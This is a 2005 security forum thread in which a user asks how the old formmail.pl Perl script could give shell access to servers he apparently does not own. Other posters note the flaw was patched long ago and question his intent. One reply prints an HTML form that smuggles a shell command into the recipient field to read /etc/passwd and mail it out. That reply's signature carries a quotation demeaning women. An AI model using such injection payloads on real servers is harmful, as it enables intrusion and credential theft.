-
May 16th, 2005, 05:33 PM
#1
formmail.pl
could i gain access to the server with this type of script, and perform commands like ls -al ?
if so, what are the datas?
-
May 16th, 2005, 06:02 PM
#2
form = "form" like you fill out
mail = e-mail
".pl" is not a Polish pornographic site it's Perl (the language, not the harbour)
It is designed to let people fill out and e-mail forms on websites AFAIK.
I really don't understand your question, as it is fairly specialist software.
But I would recommend that you read the front page of this site a bit more carefully.
-
May 16th, 2005, 06:09 PM
#3
yep i have read, and discussion here is about web security
most perl scripts can make anybody gain access to servers
like count.cgi for example or awstats.pl, calendar.pl
with this scripts somebody could view files and folders on certain servers
-
May 16th, 2005, 06:13 PM
#4
Yep, there was a known vulbnerabiltiy in formmail that would allow one to execeute shell commands and abuse a mail server.
here is a little blurb.
http://www.ctssn.com/linux/formMailExploit.html
kr5kernel
(kr5kernel at hotmail dot com)
Linux: Making Penguins Cool Since 1994.
-
May 16th, 2005, 06:24 PM
#5
Yeah, my point it is that it is probably way too specialised. It has been around quite a while, and I do believe that it could be exploited 3 or more years ago. I think that it has been beefed up a lot since then.
I would check the current situation if you are going to use it on a website, as there may still be vulnerabilities. However, I suspect that you would need quite a lot more wrong with your site for it to be a serious problem.
Sure there has been quite a lot of malware written in Perl, but remember it was written for that purpose, not as a form serving e-mail system
My advice is if you are going to use it, make sure that EVERYTHING is patched, and do a bit of research. As I said there were problems 3 or 4 years ago.
-
May 16th, 2005, 06:32 PM
#6
was hoping for some shell access data for this type of script
-
May 16th, 2005, 07:28 PM
#7
Why do you need shell access? When I want shell access I walk to the machine and utilize the keyboard.
I take it this isn't your system.....
kr5kernel
(kr5kernel at hotmail dot com)
Linux: Making Penguins Cool Since 1994.
-
May 16th, 2005, 07:54 PM
#8
... his name is sploiterwannabe .... I don't think he has the highest intentions ... could be wrong
The fool doth think he is wise, but the wiseman knows himself to be a fool - Good Ole Bill Shakespeare
-
May 16th, 2005, 08:21 PM
#9
the vulnerability in formmail.pl is an old ond dating back ti 2001. this was fixed with ver 1.06.
<html><head><title>hack</title></head>
<body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="me@mymail.host; cat /etc/passwd | mail me@mymail.host">
<input type="submit" name="submit" value="submit">
</form></body></html>
here's some old css code.... it wont work. it did but not anymore. this is true for all the so called vulns you mentioned. when a hole is discovered it gets fixed it doesn't just sit around waiting for you.
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
-
May 16th, 2005, 08:39 PM
#10
Abandon the chances of finding such a vulnerability nowadays .... Unless you are dealing with REALLY REALLY non-patched system and most importantly .. stupid admins
\"The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards - and even then I have my doubts\".....Spaf
Everytime I learn a new thing, I discover how ignorant I am.- ... Black Cluster
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|